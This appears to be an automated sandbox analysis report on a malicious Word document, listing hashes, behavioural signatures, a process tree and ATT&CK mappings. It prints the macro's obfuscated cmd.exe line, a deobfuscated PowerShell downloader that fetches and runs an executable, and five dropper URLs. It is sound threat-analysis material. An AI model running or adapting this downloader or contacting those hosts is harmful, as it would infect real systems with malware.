Analysis

  • max time kernel: 125s
  • max time network: 143s
  • platform: windows10_x64
  • resource: win10-en-20211014
  • submitted: 04-12-2021 02:36

General

  • Target: fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc
  • Size: 94KB
  • MD5: ecf475aea6d373c61244f4db7d2ee595
  • SHA1: 8f20b0a73d536e74c3c55d1fa98d07ab98ef46b6
  • SHA256: fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee
  • SHA512: e2e9852a1de72e3e8d569842899c07f0be1d0305c75ac4bfa171ffda6d7d19298da492be2b11174ffe7ab29f379a592f68e30078dffadfdf414c94433bfac087

Score
10/10

Malware Config (extracted)

  • Language: ps1
  • Deobfuscated: yes
  • URLs (exe.dropper):
    http://cotton-world.net/as03M
    http://mandram.com/2MouUZ
    http://djteresa.net/RTKYqE
    http://vkontekste.net/db20
    http://art-nail.net/Y

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SYSTEM32\Cmd.exe
      Cmd /V/C"s^e^t 7^j=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^t^ac^};^kaerb;ldd$ m^e^t^I-^ekovnI^;)ldd$ ,^awS^$(e^l^i^F^da^o^lnw^o^D^.^a^T^z^${^yrt{)^jlw^$^ ni ^aw^S$(^hc^aerof;'exe^.^'^+hNF$^+^'\'+ci^l^b^up^:vne$^=l^dd$^;^'^0^1^6' = hN^F$;)'@'(^ti^lp^S.'Y/ten^.^li^an-^tra//:^ptth@^02b^d/t^en^.et^sk^etn^o^kv//:pt^t^h^@E^q^Y^KTR/t^en^.^a^s^eretj^d//:p^tth^@^Z^Uu^oM^2/^m^oc.mar^dnam//^:^p^tth@^M30^s^a/^t^en^.^dlr^o^w^-no^t^toc//^:p^t^t^h^'^=^j^lw$;^tnei^lCbe^W^.^t^eN tcejb^o^-w^en^=^a^T^z^$ ll^e^hsr^e^wop&&^f^or /^L %^b in (3^41^,-^1^,^0)d^o ^s^et K^W^a=!K^W^a!!7^j:~%^b,1!&&i^f %^b ^l^eq ^0 ca^l^l %K^W^a:^*^KW^a!^=%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3704
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $zTa=new-object Net.WebClient;$wlj='http://cotton-world.net/as03M@http://mandram.com/2MouUZ@http://djteresa.net/RTKYqE@http://vkontekste.net/db20@http://art-nail.net/Y'.Split('@');$FNh = '610';$ddl=$env:public+'\'+$FNh+'.exe';foreach($Swa in $wlj){try{$zTa.DownloadFile($Swa, $ddl);Invoke-Item $ddl;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:844

Network

MITRE ATT&CK Matrix (ATT&CK v6)

Discovery

  • Query Registry (2 IoCs): T1012
  • System Information Discovery (2 IoCs): T1082


Downloads

  • memory/844-256-0x0000000000000000-mapping.dmp
  • memory/844-288-0x00000261DF556000-0x00000261DF558000-memory.dmp (Filesize: 8KB)
  • memory/844-267-0x00000261DF553000-0x00000261DF555000-memory.dmp (Filesize: 8KB)
  • memory/844-266-0x00000261DF550000-0x00000261DF552000-memory.dmp (Filesize: 8KB)
  • memory/2432-119-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp (Filesize: 64KB)
  • memory/2432-121-0x000002A7964E0000-0x000002A7964E2000-memory.dmp (Filesize: 8KB)
  • memory/2432-122-0x000002A7964E0000-0x000002A7964E2000-memory.dmp (Filesize: 8KB)
  • memory/2432-123-0x000002A7964E0000-0x000002A7964E2000-memory.dmp (Filesize: 8KB)
  • memory/2432-120-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp (Filesize: 64KB)
  • memory/2432-116-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp (Filesize: 64KB)
  • memory/2432-118-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp (Filesize: 64KB)
  • memory/2432-117-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp (Filesize: 64KB)
  • memory/3704-254-0x0000000000000000-mapping.dmp